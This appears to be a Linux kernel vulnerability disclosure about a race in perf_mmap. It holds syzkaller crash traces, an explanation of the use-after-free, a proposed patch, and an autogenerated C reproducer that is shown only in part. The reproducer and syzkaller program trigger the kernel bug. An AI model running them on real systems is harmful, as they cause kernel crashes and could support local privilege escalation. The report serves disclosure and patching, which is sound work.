ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow: 1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer. 2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor. 3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer. 4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window. 5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report. Security impact --------------- The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0 Request ------- Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID. Best regards, Haocheng Yu Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug. audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) \ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); 